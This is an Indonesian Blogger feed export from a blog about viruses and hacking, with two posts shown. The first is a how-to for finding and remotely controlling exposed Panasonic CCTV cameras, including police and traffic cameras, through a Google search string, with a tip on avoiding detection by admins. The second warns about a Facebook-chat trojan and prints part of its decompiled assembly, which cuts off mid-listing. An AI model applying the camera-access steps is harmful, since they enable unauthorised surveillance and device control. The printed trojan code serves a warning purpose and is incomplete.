<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8795353331269225519</id><updated>2012-02-16T15:44:43.634+07:00</updated><category term='MEMBUAT VIRUS'/><category term='mengembalikan file terhidden'/><category term='cara Mengetahui file virus.'/><category term='CARA HACKER'/><category term='VIRUS'/><category term='mencegah viruz'/><category term='MEMBUNUH VIRUS DIKOMPI'/><category term='CARA MUDAH BUAT VIRUS'/><category term='Menangkal penyebaran virus diflash disk'/><category term='BASMI VIRUS'/><category term='HACKER'/><title type='text'>BELAJAR VIRUS, KOMPUTER DAN HACKER</title><subtitle type='html'>Blog ini saya khususkan untuk orang orang yang ingin tau tentang virus dan hacker</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7279795383511349533</id><published>2011-12-28T12:01:00.000+07:00</published><updated>2011-12-28T12:01:15.503+07:00</updated><title type='text'>HACKING CCTV PANASONIC</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QPrshnPxQAo/TvqiZFib5bI/AAAAAAAAALU/Z53BmPm4B9s/s1600/New+Picture.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://1.bp.blogspot.com/-QPrshnPxQAo/TvqiZFib5bI/AAAAAAAAALU/Z53BmPm4B9s/s320/New+Picture.bmp" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;HACKING CCTV PANASONIC&lt;br /&gt;awalnya sih hanya iseng pingin lihat cctv online punya DLLAJ dan kepolisian. eh ternyata disitusnya bukan yg real time tetapi direkam diserver kemudian baru diupload kewebsite. nah dari situlah saya pingin langsung dapetin gambar secara real time tanpa harus masuk kesebuah website.&lt;br /&gt;setelah googling sana sini dapat beberapa ip cctv yang memang sudah di publish sama yg bikin blog. cuma dipikir pikir kok cuma sedikit. jadi ga puas deh.&lt;br /&gt;nah untuk lebih jelasnya simak caranya sebagai berikut :&lt;br /&gt;1. ketikan di google ==&amp;gt;&amp;nbsp;&amp;nbsp; inurl:CgiStart?page=&lt;br /&gt;2. biasanya google akan merespon anda dengan lalulintas komunikasi yang tidak layak. dan disuruh memasukan kata kata tertentu. kamu ikuti saja. biasanya google akan meminta 2x verifikasi kata.&lt;br /&gt;3. nah tara..... setelah melewati verifikasi dari google munculah banyak pilihan. pilih aja salah satu.&lt;br /&gt;4. jreng.... munculah cctv target....&lt;br /&gt;5. ada beberapa yg bisa kita ambil kendali termasuk digeser kanan dan kiri, atas serta bawah. tapi jangan ketahuan admin yah... bisa di ban&amp;nbsp; ip kamu.&lt;br /&gt;ok sekian tutorial hacking cctv online. gunakan dengan bijak yah&lt;br /&gt;&lt;img alt="" src="file:///C:/Users/jatioke/AppData/Local/Temp/moz-screenshot.png" /&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7279795383511349533?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7279795383511349533/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/12/hacking-cctv-panasonic.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7279795383511349533'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7279795383511349533'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/12/hacking-cctv-panasonic.html' title='HACKING CCTV PANASONIC'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-QPrshnPxQAo/TvqiZFib5bI/AAAAAAAAALU/Z53BmPm4B9s/s72-c/New+Picture.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-4515352201641192156</id><published>2011-10-04T07:51:00.000+07:00</published><updated>2011-10-04T08:09:38.751+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VIRUS'/><title type='text'>VIRUS TROJAN MENYEBAR VIA CHAT FB</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-JFNME930qTc/TopWyp1TrYI/AAAAAAAAAK8/QjnrIHmf4jk/s1600/virus+via+FB.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-JFNME930qTc/TopWyp1TrYI/AAAAAAAAAK8/QjnrIHmf4jk/s320/virus+via+FB.jpg" width="289" /&gt;&lt;/a&gt;&lt;/div&gt;pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-BTdzgayZ4Rc/TopXECGW_ZI/AAAAAAAAALA/M79qtfSKSPg/s1600/virus+fb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-BTdzgayZ4Rc/TopXECGW_ZI/AAAAAAAAALA/M79qtfSKSPg/s320/virus+fb.jpg" width="289" /&gt;&lt;/a&gt;&lt;/div&gt;berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.&lt;br /&gt;virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:&lt;br /&gt;n004010EF()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,esp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;esp,10&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-0C],ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ebx&lt;br /&gt;&lt;br /&gt;l00401101:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cdq&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;0F&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;idiv&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [ecx+00417DB0],cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,00000100&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;al,[edx+00416FC4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [ecx+004182BF],al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jl&amp;nbsp;&amp;nbsp;&amp;nbsp;00401101&lt;br /&gt;&lt;br /&gt;l00401124:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,000000FF&lt;br /&gt;&lt;br /&gt;l0040112B:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;edx,byte ptr [eax+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,byte ptr [eax+004182C0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;edx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,edx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;lea&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,[ebx+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dl,[ecx]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [eax+00417DB0],dl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dl,[eax+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [ecx],dl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,[ecx]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [eax+00417DB0],cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00000100&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jl&amp;nbsp;&amp;nbsp;&amp;nbsp;0040112B&lt;br /&gt;&lt;br /&gt;l00401167:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,[ebp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [0041300C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [ebx],al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-04],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;00401185&lt;br /&gt;&lt;br /&gt;l0040117A:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-04]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,[ebp-04]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [ecx+ebx],al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;0040117A&lt;br /&gt;&lt;br /&gt;l00401185:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-04],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-08],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jle&amp;nbsp;&amp;nbsp;&amp;nbsp;004012EF&lt;br /&gt;&lt;br /&gt;l00401191:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,1C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,F6&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,byte ptr [esi+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[ebp-0C]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-0C],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;lea&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[eax+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,[eax]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [esi+00417DB0],cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,[esi+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [eax],cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,[eax]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [esi+00417DB0],cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,byte ptr [eax]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,byte ptr [esi+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,[ebp+08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dl,[eax+00417DB0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[ebp-08]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;dl,[eax]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [00417A71],dl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [ebp-10],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;00401219&lt;br /&gt;&lt;br /&gt;l00401211:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;dl,dl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;byte ptr [00417A71],dl&lt;br /&gt;&lt;br /&gt;l00401219:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,19&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;al,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;al,bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,10&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,FF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,000000B2&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;al,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,1D&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,12&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ax,FFFF&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;dec&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,03&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,0D&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;al,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,1C&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;al,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;not&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sar&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,17&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,04&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;nop&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,05&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,09&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,15&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,cl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;sub&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,06&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;or&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,00&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,10&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,1B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,0D&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,04&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;cl,1A&lt;br 